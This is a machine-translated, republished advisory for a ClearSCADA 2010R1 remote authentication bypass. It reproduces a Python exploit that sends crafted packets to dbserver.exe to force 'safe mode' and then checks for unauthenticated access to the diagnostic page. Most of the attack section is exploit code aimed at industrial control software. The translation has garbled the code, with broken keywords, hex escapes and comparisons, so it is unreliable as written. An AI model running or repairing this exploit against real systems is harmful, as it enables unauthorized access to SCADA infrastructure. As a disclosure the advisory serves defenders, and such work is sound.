ClearSCADA 'dbserver.exe 'Remote Authentication Bypass Vulnerability

Source: Internet
Author: User

ClearSCADA 'dbserver.exe 'Remote Authentication Bypass Vulnerability

Release date:
Updated on:

Affected Systems:
ClearSCADA 2010R1
Description:
Bugtraq id: 72381

ClearSCADA is an integrated SCADA host platform.

ClearSCADA 2010r1and other users will enter the security mode when an exception occurs in 'dbserver.exe 'bmg. This allows remote users to access the diagnostic function without having to log on effectively, and there is a Remote Authentication Bypass Vulnerability in implementation, attackers can exploit this vulnerability to bypass authentication to obtain sensitive information.

<* Source: Jeremy Brown

Link: http://www.exploit-db.com/exploits/35924/
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
#! /Usr/bin/python
# Cs-auby.py
# ClearSCADA Remote Authentication Bypass Exploit
#
# Jeremy Brown
# [Jbrown3264/gmail]
#
# Oct 2010 (released Jan 2015)
#
# There is an authentication bypass vulnerability in ClearSCADA that can be
# Exploited by triggering an exception in dbserver.exe and taking advantage
# Of the way the program handles it.
#
# When an exception in occurs, ClearSCADA enters "Safe Mode". This exposes
# It's diagnostic functions to remote users without requiring a valid login
# As it wocould normally. A remote attacker cocould view senstive information
# And possibly modify functions of the server running on the affected host.
#
# This code triggers an exception in dbserver.exe and checks to see if you
# Can then access the diagnostic page without authentication.
#
# Tested on ClearSCADA 2010R1 running on Windows
#
# Fix information: http://ics-cert.us-cert.gov/advisories/ICSA-11-173-01
#

Import sys
Import socket
Import httplib
Import urllib
From time import sleep

Pkt_1 = (
"\ Xfb \ x0e \ x45 \ x06 \ x0e \ x00 \ x00 \ x00 \ x18 \ x00 \ x00 \ x00"
"\ X49 \ x00 \ x50 \ x00 \ x20 \ x00 \ x31 \ x00 \ x32 \ x00 \ x37 \ x00 \ x2e \ x00 \ x30 \ x00"
"\ X2e \ x00 \ x30 \ x00 \ x2e \ x00 \ x31 \ x00 \ x2c \ x00 \ x20 \ x00 \ x53 \ x00 \ x65 \ x00"
"\ X73 \ x00 \ x73 \ x00 \ x69 \ x00 \ x6f \ x00 \ x6e \ x00 \ x20 \ x00 \ x30 \ x00 \ x00 \ x00"
"\ X08 \ x00 \ x00 \ x00"
)

Pkt_2 = (
"\ X00 \ x00 \ x00 \ x00"
"\ X26 \ x00 \ x00 \ x00"
"\ X08 \ x00 \ x00 \ x00 \ x0f \ x00 \ x00 \ x00 \ x43 \ x00 \ x72 \ x00 \ x79 \ x00 \ x73 \ x00"
"\ X74 \ x00 \ x61 \ x00 \ x6c \ x00 \ x52 \ x00 \ x65 \ x00 \ x00 \ x00 \ x6f \ x00 \ x72 \ x00"
"\ X74 \ x00 \ x73 \ x00 \ x00 \ x00"
)

Pkt_3 = (# "Exception Occured"
"\ X00 \ x00 \ x00 \ x00 \ xd7 \ x01 \ x00 \ x00 \ x34 \ x00 \ x00 \ x00 \ x0d \ x00 \ x00 \ x00"
"\ X09 \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00 \ x6f \ x00 \ x66 \ x00 \ x69 \ x00"
"\ X6c \ x00 \ x65 \ x00 \ x00 \ x00 \ x0e \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00"
"\ X6f \ x00 \ x66 \ x00 \ x69 \ x00 \ x6c \ x00 \ x65 \ x00 \ x46 \ x00 \ x6c \ x00 \ x6f \ x00"
"\ X61 \ x00 \ x74 \ x00 \ x00 \ x00 \ x0e \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00"
"\ X6f \ x00 \ x66 \ x00 \ x69 \ x00 \ x6c \ x00 \ x65 \ x00 \ x55 \ x00 \ x4c \ x00 \ x6f \ x00"
"\ X6e \ x00 \ x67 \ x00 \ x00 \ x00 \ x0d \ x00 \ x00 \ x00 \ x43 \ x00 \ x50 \ x00 \ x72 \ x00"
"\ X6f \ x00 \ x66 \ x00 \ x69 \ x00 \ x6c \ x00 \ x65 \ x00 \ x4c \ x00 \ x6f \ x00 \ x6e \ x00"
"\ X67 \ x00 \ x00 \ x00 \ x10 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ xBB \ x00" # last w0rd
"\ X00 \ x42 \ x00 \ x49 \ x00 \ x54 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65"
"\ X00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41"
"\ X00 \ x64 \ x00 \ x76 \ x00 \ x42 \ x00 \ x59 \ x00 \ x54 \ x00 \ x45 \ x00 \ x56 \ x00 \ x61"
"\ X00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ cross \ x00 \ x00 \ x00 \ x11"
"\ X00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x57 \ x00 \ x4f \ x00 \ x52"
"\ X00 \ x44 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61"
"\ X00 \ x00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76"
"\ X00 \ x44 \ x00 \ x49 \ x00 \ x4e \ x00 \ x54 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75"
"\ X00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x12 \ x00 \ x00 \ x00 \ x43"
"\ X00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x55 \ x00 \ x44 \ x00 \ x49 \ x00 \ x4e \ x00 \ x54"
"\ X00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ cross"
"\ X00 \ x00 \ x00 \ x11 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x52"
"\ X00 \ x45 \ x00 \ x41 \ x00 \ x4c \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65"
"\ X00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x13 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41"
"\ X00 \ x64 \ x00 \ x76 \ x00 \ x44 \ x00 \ x4f \ x00 \ x55 \ x00 \ x42 \ x00 \ x4c \ x00 \ x45"
"\ X00 \ x56 \ x00 \ x61 \ x00 \ x6c \ x00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ cross"
"\ X00 \ x00 \ x00 \ x13 \ x00 \ x00 \ x00 \ x43 \ x00 \ x41 \ x00 \ x64 \ x00 \ x76 \ x00 \ x53"
"\ X00 \ x74 \ x00 \ x72 \ x00 \ x69 \ x00 \ x6e \ x00 \ x67 \ x00 \ x56 \ x00 \ x61 \ x00 \ x6c"
"\ X00 \ x75 \ x00 \ x65 \ x00 \ x4d \ x00 \ x61 \ x00 \ x00 \ x00 \ x00 \ x00 \ x0f \ x00 \ x00"
"\ X00 \ x43 \ x00 \ x43 \ x00 \ x72 \ x00 \ x79 \ x00 \ x73 \ x00 \ x74 \ x00 \ x61 \ x00 \ x6c"
"\ X00 \ x52 \ x00 \ x65 \ x00 \ x00 \ x00 \ x6f \ x00 \ x72 \ x00 \ x74 \ x00 \ x00 \ x00 \ x00"
)

Port = 5481
S_port = 443


Def do_ssl (target, port ):
Try:
Conn = httplib. HTTPSConnection (target, port)
Conn. _ http_vsn = 10
Conn. _ http_vsn_str = "HTTP/1.0"

Conn. request ("GET", "/diag/Info ")

Resp = conn. getresponse ()
Conn. close ()

Failed t Exception, error:
Print ("Error: % s" % error)
Return None

Return resp


Def main ():

If len (sys. argv )! = 2:
Print ("Usage: % s <target>" % sys. argv [0])
Sys. exit (0)

Target = sys. argv [1]
Cs = target, port

Print "Checking server status ..."

Resp = do_ssl (target, s_port)

If (resp = None ):
Return

If (resp. status = 301 ):
Print "Server status is normal. \ n"

Elif (resp. status == 200 ):
Print "Server is already in safe mode ."
Sys. exit (1)

Elif (resp. status! = 301) | (resp. status! = 200 )):
Print ("Server returned % d % s, server state unknown. \ nContinuing anyways .. \ n" % (resp. status, resp. reason ))

Print ("Sending packets to trigger exception... \ n ")

Try:
Sock = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
Sock. connect (cs)

Sock. send (pkt_1)
Resp_1 = sock. recv (32)

Sock. send (pkt_2)
Resp_2 = sock. recv (32)

Sock. send (pkt_3)
Resp_3 = sock. recv (32)

Sock. close ()

Failed t Exception, error:
Print ("Error: % s" % error)
Return None

Print ("Finished, checking server status again ...")

Sleep (1)

Resp = do_ssl (target, s_port)

If (resp = None ):
Return

If (resp. status = 301 ):
Print ("Server status is still normal, maybe it's patched... \ n ")

Elif (resp. status == 200 ):
Print ("Server entered \" safe \ "mode :) \ n ")
Print ("Surf on over to https: // % s: 443/diag/Info to detail e" % target)

Elif (resp. status! = 301) | (resp. status! = 200 )):
Print ("Server returned % d % s, server state unknown." % (resp. status, resp. reason ))


If _ name _ = "_ main __":
Main ()

Suggestion:
Vendor patch:

ClearSCADA
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.clearscada.com/

This article permanently updates the link address:

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.